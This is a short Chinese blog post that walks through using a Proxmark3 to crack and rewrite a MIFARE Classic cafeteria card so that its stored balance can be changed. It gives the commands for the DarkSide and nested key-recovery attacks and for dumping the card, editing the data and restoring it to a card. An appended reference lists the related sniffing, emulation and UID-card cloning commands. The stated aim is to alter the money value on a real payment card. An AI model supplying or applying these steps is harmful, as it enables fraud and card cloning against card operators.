美文网首页
proxmark3之改饭卡金额

proxmark3之改饭卡金额

作者: 姜喃人 | 来源:发表于2015-10-29 01:02 被阅读4641次

    对于无线射频卡RFID小弟有所研究今日分享一篇关于修改饭卡金额的文章

    如果对ID,IC卡还不是很了解先看看raidwar的文章把,驱动什么的请自行百度

    低俗文章之傻傻分不清楚的ic和id卡

    以及命令帮助

    使用Proxmark3进行MIFARE Classic卡的安全测试

    以及数据分析

    RFID之M1卡数据分析

    下面进入正题

    首先

    驱动装好之后可以看到设备管理器中查看 发现proxmark3使用是COM5端口

    proxmark3.exe COM5

    hw tune

    成功后如下显示

    此时讲自己的高频卡放上去然后直接使用命令

    hf mf mifare

    如果

    找到 validkey 则直接使用命令: 

    必须知道一个正确的Key方可进行相关的操作

    hf mf nested 1 0 A ffffffffffff

    基于验证漏洞进行全卡区域Key破解 

    如果结果为

    则   再次进行漏洞循环破解

    hf mf mifare 524bb6a2 

    直到找到正确密码为止(显示Found valid key)

    找到密码后使用(测试嵌套认证漏洞,基于一个已知Key,获取都有扇区Keys)

    hf mf nested 1 0 A ffffffffffff d

    导出密码二进制文件,接着使用

    hf mf dump

    dump数据到bin文件 后分析修改数据后再次导入

    使用命令以二进制方式恢复数据到空白的MIFARE classic卡

    hf mf restore

    完成

    附录

    hf mf (MIFARE卡的相关命令...)

    help显示帮助

    dbg设置默认调试模式

    rdbl读取MIFARE classic卡的区块数据

    rdsc读取MIFARE classic卡的扇区数据

    dump导出MIFARE classic卡的数据到二进制文件

    restore从二进制文件恢复数据到空白的MIFARE classic卡

    wrbl改写MIFARE classic卡的区块数据

    chk测试MIFARE classic卡的各个区块KEY A/B

    mifare基于PRNG漏洞,执行mifare “DarkSide”攻击操作

    nested测试嵌套认证漏洞,基于一个已知Key,获取都有扇区Keys

    sniff嗅卡片与读写器之间的通讯(等同于hf 14a snoop)

    sim模拟一个MIFARE卡片

    eclr清除仿真内存的各区块数据

    eget获取仿真内存的各区块数据

    eset设置仿真内存的各区块数据

    eload从导出的文件加载仿真数据

    esave导出保存仿真数据到文件

    ecfill利用仿真器的keys来填补仿真内存

    ekeyprn打印输出仿真内存中的keys

    csetuid直接设置可改UID卡的UID

    csetblk把对应区块数据写入UID卡

    cgetblk读取UID卡对应区块数据

    cgetsc读取UID卡对应扇区数据

    cload写入dump数据到UID卡。注意

    csave保存UID卡数据到文件或者仿真内存

    相关文章

      网友评论

          本文标题:proxmark3之改饭卡金额

          本文链接:https://www.haomeiwen.com/subject/sutfhttx.html